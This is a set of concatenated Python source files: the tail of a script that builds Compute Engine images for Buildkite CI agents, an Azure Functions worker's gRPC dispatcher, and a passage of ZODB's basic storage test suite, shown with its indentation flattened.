# 'source_image': 'https://www.googleapis.com/compute/v1/projects/freebsd-org-cloud-dev/global/images/freebsd-11-1-stable-amd64-2017-12-28',
# 'scripts': [
# 'setup-freebsd.sh',
# 'install-buildkite-agent.sh'
# ]
# },
("bk-docker",): {
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1804-lts",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
(
"bk-windows-java8",
# 'bk-worker-windows-java9',
# 'bk-worker-windows-java10',
): {
"source_image_project": "windows-cloud",
"source_image_family": "windows-1803-core",
"setup_script": "setup-windows.ps1",
},
}
WORK_QUEUE = queue.Queue()
def run(args, **kwargs):
return subprocess.run(args, **kwargs)
def preprocess_setup_script(setup_script, is_windows):
output_file = tempfile.mkstemp()[1]
newline = "\r\n" if is_windows else "\n"
with open(output_file, "w", newline=newline) as f:
with open(setup_script, "r") as setup_script_file:
if is_windows:
f.write("$setup_script = @'\n")
f.write(setup_script_file.read() + "\n")
if is_windows:
f.write("'@\n")
f.write('[System.IO.File]::WriteAllLines("c:\\setup.ps1", $setup_script)\n')
return output_file
def create_instance(instance_name, params):
is_windows = "windows" in instance_name
setup_script = preprocess_setup_script(params["setup_script"], is_windows)
try:
if is_windows:
startup_script = "windows-startup-script-ps1=" + setup_script
else:
startup_script = "startup-script=" + setup_script
if "source_image" in params:
image = {"image": params["source_image"]}
else:
image = {
"image-project": params["source_image_project"],
"image-family": params["source_image_family"],
}
gcloud.create_instance(
instance_name,
project=PROJECT,
zone=LOCATION,
machine_type="n1-standard-8",
network="buildkite",
metadata_from_file=startup_script,
min_cpu_platform="Intel Skylake",
boot_disk_type="pd-ssd",
boot_disk_size="50GB",
**image,
)
finally:
os.remove(setup_script)
# https://stackoverflow.com/a/25802742
def write_to_clipboard(output):
process = subprocess.Popen("pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE)
process.communicate(output.encode("utf-8"))
def print_windows_instructions(instance_name):
tail_start = gcloud_utils.tail_serial_console(
instance_name, project=PROJECT, zone=LOCATION, until="Finished running startup scripts"
)
pw = json.loads(
gcloud.reset_windows_password(
instance_name, format="json", project=PROJECT, zone=LOCATION
).stdout
)
rdp_file = tempfile.mkstemp(suffix=".rdp")[1]
with open(rdp_file, "w") as f:
f.write("full address:s:" + pw["ip_address"] + "\n")
f.write("username:s:" + pw["username"] + "\n")
subprocess.run(["open", rdp_file])
write_to_clipboard(pw["password"])
with gcloud.PRINT_LOCK:
print("Use this password to connect to the Windows VM: " + pw["password"])
print("Please run the setup script C:\\setup.ps1 once you're logged in.")
# Wait until the VM reboots once, then open RDP again.
tail_start = gcloud_utils.tail_serial_console(
instance_name,
project=PROJECT,
zone=LOCATION,
start=tail_start,
until="Finished running startup scripts",
)
print("Connecting via RDP a second time to finish the setup...")
write_to_clipboard(pw["password"])
run(["open", rdp_file])
return tail_start
def workflow(name, params):
instance_name = "%s-image-%s" % (name, int(datetime.now().timestamp()))
try:
# Create the VM.
create_instance(instance_name, params)
# Wait for the VM to become ready.
gcloud_utils.wait_for_instance(
instance_name, project=PROJECT, zone=LOCATION, status="RUNNING"
)
if "windows" in instance_name:
# Wait for VM to be ready, then print setup instructions.
tail_start = print_windows_instructions(instance_name)
# Continue printing the serial console until the VM shuts down.
gcloud_utils.tail_serial_console(
instance_name, project=PROJECT, zone=LOCATION, start=tail_start
)
else:
# Continuously print the serial console.
gcloud_utils.tail_serial_console(instance_name, project=PROJECT, zone=LOCATION)
# Wait for the VM to completely shutdown.
gcloud_utils.wait_for_instance(
instance_name, project=PROJECT, zone=LOCATION, status="TERMINATED"
)
# Create a new image from our VM.
gcloud.create_image(
instance_name,
project=PROJECT,
family=name,
source_disk=instance_name,
source_disk_zone=LOCATION,
licenses=params.get("licenses", []),
)
finally:
gcloud.delete_instance(instance_name, project=PROJECT, zone=LOCATION)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
workflow(**item)
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
print(
"Usage: create_images.py {}".format(
" ".join(itertools.chain(*IMAGE_CREATION_VMS.keys()))
)
)
return 1
if subprocess.check_output(["git", "status", "--porcelain"], universal_newlines=True).strip():
print(
"There are pending changes in your Git repository. You have to commit "
"them, before create_images.py can continue.",
file=sys.stderr,
)
return 1
# Put VM creation instructions into the work queue.
for names, params in IMAGE_CREATION_VMS.items():
for name in names:
if argv and name not in argv:
continue
WORK_QUEUE.put({"name": name, "params": params})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
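# Example invocations (illustrative), using image family names defined in
# IMAGE_CREATION_VMS above:
#   ./create_images.py bk-docker
#   ./create_images.py bk-windows-java8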
|
dispatcher.py
|
"""GRPC client.
Implements loading and execution of Python workers.
"""
import asyncio
import concurrent.futures
import logging
import queue
import threading
import traceback
import grpc
from . import bindings
from . import functions
from . import loader
from . import protos
from .logging import error_logger, logger
class DispatcherMeta(type):
__current_dispatcher__ = None
@property
def current(mcls):
disp = mcls.__current_dispatcher__
if disp is None:
raise RuntimeError('no currently running Dispatcher is found')
return disp
class Dispatcher(metaclass=DispatcherMeta):
_GRPC_STOP_RESPONSE = object()
def __init__(self, loop, host, port, worker_id, request_id,
grpc_connect_timeout, grpc_max_msg_len):
self._loop = loop
self._host = host
self._port = port
self._request_id = request_id
self._worker_id = worker_id
self._functions = functions.Registry()
# A thread-pool for synchronous function calls. We limit
# the number of threads to 1 so that one Python worker can
# only run one synchronous function in parallel. This is
# because synchronous code in Python is rarely designed with
# concurrency in mind, so we don't want to allow users to
# have races in their synchronous functions. Moreover,
# because of the GIL in CPython, it rarely makes sense to
# use threads (unless the code is IO bound, but we have
# async support for that.)
self._sync_call_tp = concurrent.futures.ThreadPoolExecutor(
max_workers=1)
self._grpc_connect_timeout = grpc_connect_timeout
self._grpc_max_msg_len = grpc_max_msg_len
self._grpc_resp_queue: queue.Queue = queue.Queue()
self._grpc_connected_fut = loop.create_future()
self._grpc_thread = threading.Thread(
name='grpc-thread', target=self.__poll_grpc)
@classmethod
async def connect(cls, host, port, worker_id, request_id,
connect_timeout, max_msg_len=None):
loop = asyncio._get_running_loop()
disp = cls(loop, host, port, worker_id, request_id,
connect_timeout, max_msg_len)
disp._grpc_thread.start()
await disp._grpc_connected_fut
logger.info('Successfully opened gRPC channel to %s:%s', host, port)
return disp
async def dispatch_forever(self):
if DispatcherMeta.__current_dispatcher__ is not None:
raise RuntimeError(
'there can be only one running dispatcher per process')
self._old_task_factory = self._loop.get_task_factory()
loader.install()
DispatcherMeta.__current_dispatcher__ = self
try:
forever = self._loop.create_future()
self._grpc_resp_queue.put_nowait(
protos.StreamingMessage(
request_id=self.request_id,
start_stream=protos.StartStream(
worker_id=self.worker_id)))
self._loop.set_task_factory(
lambda loop, coro: ContextEnabledTask(coro, loop=loop))
logging_handler = AsyncLoggingHandler()
root_logger = logging.getLogger()
root_logger.setLevel(logging.INFO)
root_logger.addHandler(logging_handler)
try:
await forever
finally:
root_logger.removeHandler(logging_handler)
finally:
DispatcherMeta.__current_dispatcher__ = None
loader.uninstall()
self._loop.set_task_factory(self._old_task_factory)
self.stop()
def stop(self):
if self._grpc_thread is not None:
self._grpc_resp_queue.put_nowait(self._GRPC_STOP_RESPONSE)
self._grpc_thread.join()
self._grpc_thread = None
if self._sync_call_tp is not None:
self._sync_call_tp.shutdown()
self._sync_call_tp = None
def _on_logging(self, record: logging.LogRecord, formatted_msg: str):
if record.levelno >= logging.CRITICAL:
log_level = protos.RpcLog.Critical
elif record.levelno >= logging.ERROR:
log_level = protos.RpcLog.Error
elif record.levelno >= logging.WARNING:
log_level = protos.RpcLog.Warning
elif record.levelno >= logging.INFO:
log_level = protos.RpcLog.Information
elif record.levelno >= logging.DEBUG:
log_level = protos.RpcLog.Debug
else:
log_level = getattr(protos.RpcLog, 'None')
log = dict(
level=log_level,
message=formatted_msg,
category=record.name,
)
invocation_id = get_current_invocation_id()
if invocation_id is not None:
log['invocation_id'] = invocation_id
# XXX: When an exception field is set in RpcLog, WebHost doesn't
# wait for the call result and simply aborts the execution.
#
# if record.exc_info and record.exc_info[1] is not None:
# log['exception'] = self._serialize_exception(record.exc_info[1])
self._grpc_resp_queue.put_nowait(
protos.StreamingMessage(
request_id=self.request_id,
rpc_log=protos.RpcLog(**log)))
@property
def request_id(self):
return self._request_id
@property
def worker_id(self):
return self._worker_id
def _serialize_exception(self, exc):
try:
message = f'{type(exc).__name__}: {exc}'
except Exception:
message = (f'Unhandled exception in function. '
f'Could not serialize original exception message.')
try:
stack_trace = ''.join(traceback.format_tb(exc.__traceback__))
except Exception:
stack_trace = ''
return protos.RpcException(message=message, stack_trace=stack_trace)
async def _dispatch_grpc_request(self, request):
content_type = request.WhichOneof('content')
request_handler = getattr(self, f'_handle__{content_type}', None)
if request_handler is None:
# Don't crash on unknown messages. Some of them can be ignored;
# and if something goes really wrong the host can always just
# kill the worker's process.
logger.error(
f'unknown StreamingMessage content type {content_type}')
return
resp = await request_handler(request)
self._grpc_resp_queue.put_nowait(resp)
async def _handle__worker_init_request(self, req):
logger.info('Received WorkerInitRequest, request ID %s',
self.request_id)
return protos.StreamingMessage(
request_id=self.request_id,
worker_init_response=protos.WorkerInitResponse(
result=protos.StatusResult(
status=protos.StatusResult.Success)))
async def _handle__function_load_request(self, req):
func_request = req.function_load_request
function_id = func_request.function_id
logger.info('Received FunctionLoadRequest, request ID: %s, '
'function ID: %s', self.request_id, function_id)
try:
func = loader.load_function(
func_request.metadata.name,
func_request.metadata.directory,
func_request.metadata.script_file,
func_request.metadata.entry_point)
self._functions.add_function(
function_id, func, func_request.metadata)
logger.info('Successfully processed FunctionLoadRequest, '
'request ID: %s, function ID: %s',
self.request_id, function_id)
return protos.StreamingMessage(
request_id=self.request_id,
function_load_response=protos.FunctionLoadResponse(
function_id=function_id,
result=protos.StatusResult(
status=protos.StatusResult.Success)))
except Exception as ex:
return protos.StreamingMessage(
request_id=self.request_id,
function_load_response=protos.FunctionLoadResponse(
function_id=function_id,
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex))))
async def _handle__invocation_request(self, req):
invoc_request = req.invocation_request
invocation_id = invoc_request.invocation_id
function_id = invoc_request.function_id
# Set the current `invocation_id` to the current task so
# that our logging handler can find it.
current_task = asyncio.Task.current_task(self._loop)
assert isinstance(current_task, ContextEnabledTask)
current_task.set_azure_invocation_id(invocation_id)
logger.info('Received FunctionInvocationRequest, request ID: %s, '
'function ID: %s, invocation ID: %s',
self.request_id, function_id, invocation_id)
try:
fi: functions.FunctionInfo = self._functions.get_function(
function_id)
args = {}
for pb in invoc_request.input_data:
pb_type_info = fi.input_types[pb.name]
if bindings.is_trigger_binding(pb_type_info.binding_name):
trigger_metadata = invoc_request.trigger_metadata
else:
trigger_metadata = None
args[pb.name] = bindings.from_incoming_proto(
pb_type_info.binding_name, pb.data,
trigger_metadata=trigger_metadata,
pytype=pb_type_info.pytype)
if fi.requires_context:
args['context'] = bindings.Context(
fi.name, fi.directory, invocation_id)
if fi.output_types:
for name in fi.output_types:
args[name] = bindings.Out()
if fi.is_async:
call_result = await fi.func(**args)
else:
call_result = await self._loop.run_in_executor(
self._sync_call_tp,
self.__run_sync_func, invocation_id, fi.func, args)
if call_result is not None and not fi.has_return:
raise RuntimeError(
f'function {fi.name!r} without a $return binding '
f'returned a non-None value')
output_data = []
if fi.output_types:
for out_name, out_type_info in fi.output_types.items():
                    val = args[out_name].get()
if val is None:
# TODO: is the "Out" parameter optional?
# Can "None" be marshaled into protos.TypedData?
continue
rpc_val = bindings.to_outgoing_proto(
out_type_info.binding_name, val,
pytype=out_type_info.pytype)
assert rpc_val is not None
output_data.append(
protos.ParameterBinding(
                            name=out_name,
data=rpc_val))
return_value = None
if fi.return_type is not None:
return_value = bindings.to_outgoing_proto(
fi.return_type.binding_name, call_result,
pytype=fi.return_type.pytype)
logger.info('Successfully processed FunctionInvocationRequest, '
'request ID: %s, function ID: %s, invocation ID: %s',
self.request_id, function_id, invocation_id)
return protos.StreamingMessage(
request_id=self.request_id,
invocation_response=protos.InvocationResponse(
invocation_id=invocation_id,
return_value=return_value,
result=protos.StatusResult(
status=protos.StatusResult.Success),
output_data=output_data))
except Exception as ex:
return protos.StreamingMessage(
request_id=self.request_id,
invocation_response=protos.InvocationResponse(
invocation_id=invocation_id,
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex))))
def __run_sync_func(self, invocation_id, func, params):
# This helper exists because we need to access the current
# invocation_id from ThreadPoolExecutor's threads.
_invocation_id_local.v = invocation_id
try:
return func(**params)
finally:
_invocation_id_local.v = None
def __poll_grpc(self):
options = []
if self._grpc_max_msg_len:
options.append(('grpc.max_receive_message_length',
self._grpc_max_msg_len))
options.append(('grpc.max_send_message_length',
self._grpc_max_msg_len))
channel = grpc.insecure_channel(
f'{self._host}:{self._port}', options)
try:
grpc.channel_ready_future(channel).result(
timeout=self._grpc_connect_timeout)
except Exception as ex:
self._loop.call_soon_threadsafe(
self._grpc_connected_fut.set_exception, ex)
return
else:
self._loop.call_soon_threadsafe(
self._grpc_connected_fut.set_result, True)
stub = protos.FunctionRpcStub(channel)
def gen(resp_queue):
while True:
msg = resp_queue.get()
if msg is self._GRPC_STOP_RESPONSE:
grpc_req_stream.cancel()
return
yield msg
grpc_req_stream = stub.EventStream(gen(self._grpc_resp_queue))
try:
for req in grpc_req_stream:
self._loop.call_soon_threadsafe(
self._loop.create_task, self._dispatch_grpc_request(req))
except Exception as ex:
if ex is grpc_req_stream:
# Yes, this is how grpc_req_stream iterator exits.
return
error_logger.exception('unhandled error in gRPC thread')
raise
class AsyncLoggingHandler(logging.Handler):
def emit(self, record):
if not record.name.startswith('azure.functions_worker'):
            # Worker system logs are skipped; only user/function logs are forwarded.
msg = self.format(record)
Dispatcher.current._on_logging(record, msg)
class ContextEnabledTask(asyncio.Task):
_AZURE_INVOCATION_ID = '__azure_function_invocation_id__'
def __init__(self, coro, loop):
super().__init__(coro, loop=loop)
current_task = asyncio.Task.current_task(loop)
if current_task is not None:
invocation_id = getattr(
current_task, self._AZURE_INVOCATION_ID, None)
if invocation_id is not None:
self.set_azure_invocation_id(invocation_id)
def set_azure_invocation_id(self, invocation_id):
setattr(self, self._AZURE_INVOCATION_ID, invocation_id)
def get_current_invocation_id():
loop = asyncio._get_running_loop()
if loop is not None:
current_task = asyncio.Task.current_task(loop)
if current_task is not None:
return getattr(
current_task, ContextEnabledTask._AZURE_INVOCATION_ID, None)
return getattr(_invocation_id_local, 'v', None)
_invocation_id_local = threading.local()
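# Hedged illustration (not part of the worker): a small, self-contained sketch of how
# an invocation id set on a ContextEnabledTask propagates to child tasks created by
# the same task factory, which is what get_current_invocation_id() relies on inside
# async functions. It deliberately uses the same legacy asyncio APIs as this module
# (asyncio.Task.current_task and loop-based task factories); 'demo-invocation' is a
# made-up id.
def _invocation_id_propagation_example():
    async def child():
        return get_current_invocation_id()
    async def parent():
        asyncio.Task.current_task().set_azure_invocation_id('demo-invocation')
        return await asyncio.ensure_future(child())
    loop = asyncio.new_event_loop()
    loop.set_task_factory(lambda l, coro: ContextEnabledTask(coro, loop=l))
    try:
        return loop.run_until_complete(parent())  # -> 'demo-invocation'
    finally:
        loop.close()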
|
BasicStorage.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Run the basic tests for a storage as described in the official storage API
The most complete and most out-of-date description of the interface is:
http://www.zope.org/Documentation/Developer/Models/ZODB/ZODB_Architecture_Storage_Interface_Info.html
All storages should be able to pass these tests.
"""
import transaction
from ZODB import DB, POSException
from ZODB.Connection import TransactionMetaData
from ZODB.tests.MinPO import MinPO
from ZODB.tests.StorageTestBase import zodb_unpickle, zodb_pickle
from ZODB.tests.StorageTestBase import ZERO
from ZODB.tests.util import with_high_concurrency
import threading
import time
import zope.interface
import zope.interface.verify
from random import randint
from .. import utils
class BasicStorage(object):
def checkBasics(self):
self.assertEqual(self._storage.lastTransaction(), ZERO)
t = TransactionMetaData()
self._storage.tpc_begin(t)
self.assertRaises(POSException.StorageTransactionError,
self._storage.tpc_begin, t)
# Aborting is easy
self._storage.tpc_abort(t)
# Test a few expected exceptions when we're doing operations giving a
# different Transaction object than the one we've begun on.
self._storage.tpc_begin(t)
self.assertRaises(
POSException.StorageTransactionError,
self._storage.store,
ZERO, ZERO, b'', '', TransactionMetaData())
self.assertRaises(
POSException.StorageTransactionError,
self._storage.store,
ZERO, 1, b'2', '', TransactionMetaData())
self.assertRaises(
POSException.StorageTransactionError,
self._storage.tpc_vote, TransactionMetaData())
self._storage.tpc_abort(t)
def checkSerialIsNoneForInitialRevision(self):
eq = self.assertEqual
oid = self._storage.new_oid()
txn = TransactionMetaData()
self._storage.tpc_begin(txn)
# Use None for serial. Don't use _dostore() here because that coerces
# serial=None to serial=ZERO.
self._storage.store(oid, None, zodb_pickle(MinPO(11)),
'', txn)
self._storage.tpc_vote(txn)
newrevid = self._storage.tpc_finish(txn)
data, revid = utils.load_current(self._storage, oid)
value = zodb_unpickle(data)
eq(value, MinPO(11))
eq(revid, newrevid)
def checkStore(self):
revid = ZERO
newrevid = self._dostore(revid=None)
# Finish the transaction.
self.assertNotEqual(newrevid, revid)
def checkStoreAndLoad(self):
eq = self.assertEqual
oid = self._storage.new_oid()
self._dostore(oid=oid, data=MinPO(7))
data, revid = utils.load_current(self._storage, oid)
value = zodb_unpickle(data)
eq(value, MinPO(7))
# Now do a bunch of updates to an object
for i in range(13, 22):
revid = self._dostore(oid, revid=revid, data=MinPO(i))
# Now get the latest revision of the object
data, revid = utils.load_current(self._storage, oid)
eq(zodb_unpickle(data), MinPO(21))
def checkConflicts(self):
oid = self._storage.new_oid()
revid1 = self._dostore(oid, data=MinPO(11))
self._dostore(oid, revid=revid1, data=MinPO(12))
self.assertRaises(POSException.ConflictError,
self._dostore,
oid, revid=revid1, data=MinPO(13))
def checkWriteAfterAbort(self):
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
# Now abort this transaction
self._storage.tpc_abort(t)
# Now start all over again
oid = self._storage.new_oid()
self._dostore(oid=oid, data=MinPO(6))
def checkAbortAfterVote(self):
oid1 = self._storage.new_oid()
revid1 = self._dostore(oid=oid1, data=MinPO(-2))
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
# Now abort this transaction
self._storage.tpc_vote(t)
self._storage.tpc_abort(t)
# Now start all over again
oid = self._storage.new_oid()
revid = self._dostore(oid=oid, data=MinPO(6))
for oid, revid in [(oid1, revid1), (oid, revid)]:
data, _revid = utils.load_current(self._storage, oid)
self.assertEqual(revid, _revid)
def checkStoreTwoObjects(self):
noteq = self.assertNotEqual
p31, p32, p51, p52 = map(MinPO, (31, 32, 51, 52))
oid1 = self._storage.new_oid()
oid2 = self._storage.new_oid()
noteq(oid1, oid2)
revid1 = self._dostore(oid1, data=p31)
revid2 = self._dostore(oid2, data=p51)
noteq(revid1, revid2)
revid3 = self._dostore(oid1, revid=revid1, data=p32)
revid4 = self._dostore(oid2, revid=revid2, data=p52)
noteq(revid3, revid4)
def checkGetTid(self):
if not hasattr(self._storage, 'getTid'):
return
eq = self.assertEqual
p41, p42 = map(MinPO, (41, 42))
oid = self._storage.new_oid()
self.assertRaises(KeyError, self._storage.getTid, oid)
# Now store a revision
revid1 = self._dostore(oid, data=p41)
eq(revid1, self._storage.getTid(oid))
# And another one
revid2 = self._dostore(oid, revid=revid1, data=p42)
eq(revid2, self._storage.getTid(oid))
def checkLen(self):
# len(storage) reports the number of objects.
# check it is zero when empty
        self.assertEqual(len(self._storage), 0)
        # check it is correct when the storage contains two objects.
# len may also be zero, for storages that do not keep track
# of this number
self._dostore(data=MinPO(22))
self._dostore(data=MinPO(23))
        self.assertTrue(len(self._storage) in [0, 2])
def checkGetSize(self):
self._dostore(data=MinPO(25))
size = self._storage.getSize()
# The storage API doesn't make any claims about what size
# means except that it ought to be printable.
str(size)
def checkNote(self):
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
t.note(u'this is a test')
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
def checkInterfaces(self):
for iface in zope.interface.providedBy(self._storage):
zope.interface.verify.verifyObject(iface, self._storage)
def checkMultipleEmptyTransactions(self):
# There was a bug in handling empty transactions in mapping
# storage that caused the commit lock not to be released. :(
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
t = TransactionMetaData()
self._storage.tpc_begin(t) # Hung here before
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
def _do_store_in_separate_thread(self, oid, revid, voted):
# We'll run the competing trans in a separate thread:
thread = threading.Thread(name='T2',
target=self._dostore, args=(oid,), kwargs=dict(revid=revid))
thread.daemon = True
thread.start()
thread.join(.1)
return thread
def check_checkCurrentSerialInTransaction(self):
oid = b'\0\0\0\0\0\0\0\xf0'
tid = self._dostore(oid)
tid2 = self._dostore(oid, revid=tid)
data = b'cpersistent\nPersistent\nq\x01.N.' # a simple persistent obj
#----------------------------------------------------------------------
# stale read
t = TransactionMetaData()
self._storage.tpc_begin(t)
try:
self._storage.store(b'\0\0\0\0\0\0\0\xf1',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid, t)
self._storage.tpc_vote(t)
except POSException.ReadConflictError as v:
self.assertEqual(v.oid, oid)
self.assertEqual(v.serials, (tid2, tid))
else:
if 0: self.assertTrue(False, "No conflict error")
self._storage.tpc_abort(t)
#----------------------------------------------------------------------
# non-stale read, no stress. :)
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf2',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid2, t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
#----------------------------------------------------------------------
# non-stale read, competition after vote. The competing
# transaction must produce a tid > this transaction's tid
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf3',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid2, t)
self._storage.tpc_vote(t)
# We'll run the competing trans in a separate thread:
thread = self._do_store_in_separate_thread(oid, tid2, True)
self._storage.tpc_finish(t)
thread.join(33)
tid3 = utils.load_current(self._storage, oid)[1]
self.assertTrue(tid3 >
utils.load_current(
self._storage, b'\0\0\0\0\0\0\0\xf3')[1])
#----------------------------------------------------------------------
# non-stale competing trans after checkCurrentSerialInTransaction
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf4',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid3, t)
thread = self._do_store_in_separate_thread(oid, tid3, False)
# There are 2 possibilities:
# 1. The store happens before this transaction completes,
# in which case, the vote below fails.
# 2. The store happens after this trans, in which case, the
# tid of the object is greater than this transaction's tid.
try:
self._storage.tpc_vote(t)
except POSException.ReadConflictError:
thread.join() # OK :)
else:
self._storage.tpc_finish(t)
thread.join()
tid4 = utils.load_current(self._storage, oid)[1]
self.assertTrue(
tid4 >
utils.load_current(self._storage, b'\0\0\0\0\0\0\0\xf4')[1])
def check_tid_ordering_w_commit(self):
# It's important that storages always give a consistent
# ordering for revisions, tids. This is most likely to fail
# around commit. Here we'll do some basic tests to check this.
# We'll use threads to arrange for ordering to go wrong and
# verify that a storage gets it right.
# First, some initial data.
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(ZERO, ZERO, b'x', '', t)
self._storage.tpc_vote(t)
tids = []
self._storage.tpc_finish(t, lambda tid: tids.append(tid))
# OK, now we'll start a new transaction, take it to finish,
# and then block finish while we do some other operations.
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(ZERO, tids[0], b'y', '', t)
self._storage.tpc_vote(t)
to_join = []
def run_in_thread(func):
t = threading.Thread(target=func)
t.daemon = True
t.start()
to_join.append(t)
started = threading.Event()
finish = threading.Event()
@run_in_thread
def commit():
def callback(tid):
started.set()
tids.append(tid)
finish.wait()
self._storage.tpc_finish(t, callback)
results = {}
started.wait()
attempts = []
attempts_cond = utils.Condition()
def update_attempts():
with attempts_cond:
attempts.append(1)
attempts_cond.notify_all()
@run_in_thread
def load():
update_attempts()
results['load'] = utils.load_current(self._storage, ZERO)[1]
results['lastTransaction'] = self._storage.lastTransaction()
expected_attempts = 1
if hasattr(self._storage, 'getTid'):
expected_attempts += 1
@run_in_thread
def getTid():
update_attempts()
results['getTid'] = self._storage.getTid(ZERO)
if hasattr(self._storage, 'lastInvalidations'):
expected_attempts += 1
@run_in_thread
def lastInvalidations():
update_attempts()
invals = self._storage.lastInvalidations(1)
if invals:
results['lastInvalidations'] = invals[0][0]
with attempts_cond:
while len(attempts) < expected_attempts:
attempts_cond.wait()
time.sleep(.01) # for good measure :)
finish.set()
for t in to_join:
t.join(1)
self.assertEqual(results.pop('load'), tids[1])
self.assertEqual(results.pop('lastTransaction'), tids[1])
for m, tid in results.items():
self.assertEqual(tid, tids[1])
# verify storage/Connection for race in between load/open and local invalidations.
# https://github.com/zopefoundation/ZEO/issues/166
# https://github.com/zopefoundation/ZODB/issues/290
@with_high_concurrency
def check_race_loadopen_vs_local_invalidate(self):
db = DB(self._storage)
# init initializes the database with two integer objects - obj1/obj2
# that are set to 0.
def init():
transaction.begin()
zconn = db.open()
root = zconn.root()
root['obj1'] = MinPO(0)
root['obj2'] = MinPO(0)
transaction.commit()
zconn.close()
# verify accesses obj1/obj2 and verifies that obj1.value == obj2.value
#
# access to obj1 is organized to always trigger loading from zstor.
# access to obj2 goes through zconn cache and so verifies whether the
# cache is not stale.
failed = threading.Event()
failure = [None]
def verify():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
# obj1 - reload it from zstor
# obj2 - get it from zconn cache
obj1._p_invalidate()
# both objects must have the same values
v1 = obj1.value
v2 = obj2.value
if v1 != v2:
failure[0] = "verify: obj1.value (%d) != obj2.value (%d)" % (v1, v2)
failed.set()
            transaction.abort()  # we did not change anything; it also fails with commit
zconn.close()
# modify changes obj1/obj2 by doing `objX.value += 1`.
#
# Since both objects start from 0, the invariant that
# `obj1.value == obj2.value` is always preserved.
def modify():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
obj1.value += 1
obj2.value += 1
assert obj1.value == obj2.value
transaction.commit()
zconn.close()
# xrun runs f in a loop until either N iterations, or until failed is set.
def xrun(f, N):
try:
for i in range(N):
#print('%s.%d' % (f.__name__, i))
f()
if failed.is_set():
break
except:
failed.set()
raise
# loop verify and modify concurrently.
init()
N = 500
tverify = threading.Thread(name='Tverify', target=xrun, args=(verify, N))
tmodify = threading.Thread(name='Tmodify', target=xrun, args=(modify, N))
tverify.start()
tmodify.start()
tverify.join(60)
tmodify.join(60)
if failed.is_set():
self.fail(failure[0])
# client-server storages like ZEO, NEO and RelStorage allow several storage
# clients to be connected to single storage server.
#
# For client-server storages test subclasses should implement
# _new_storage_client to return new storage client that is connected to the
# same storage server self._storage is connected to.
def _new_storage_client(self):
raise NotImplementedError
# verify storage for race in between load and external invalidations.
# https://github.com/zopefoundation/ZEO/issues/155
#
# This test is similar to check_race_loadopen_vs_local_invalidate but does
# not reuse its code because the probability to reproduce external
# invalidation bug with only 1 mutator + 1 verifier is low.
@with_high_concurrency
def check_race_load_vs_external_invalidate(self):
# dbopen creates new client storage connection and wraps it with DB.
def dbopen():
try:
zstor = self._new_storage_client()
except NotImplementedError:
# the test will be skipped from main thread because dbopen is
# first used in init on the main thread before any other thread
# is spawned.
self.skipTest("%s does not implement _new_storage_client" % type(self))
return DB(zstor)
# init initializes the database with two integer objects - obj1/obj2 that are set to 0.
def init():
db = dbopen()
transaction.begin()
zconn = db.open()
root = zconn.root()
root['obj1'] = MinPO(0)
root['obj2'] = MinPO(0)
transaction.commit()
zconn.close()
db.close()
# we'll run 8 T workers concurrently. As of 20210416, due to race conditions
# in ZEO, it triggers the bug where T sees stale obj2 with obj1.value != obj2.value
#
# The probability to reproduce the bug is significantly reduced with
# decreasing n(workers): almost never with nwork=2 and sometimes with nwork=4.
nwork = 8
# T is a worker that accesses obj1/obj2 in a loop and verifies
# `obj1.value == obj2.value` invariant.
#
# access to obj1 is organized to always trigger loading from zstor.
# access to obj2 goes through zconn cache and so verifies whether the cache is not stale.
#
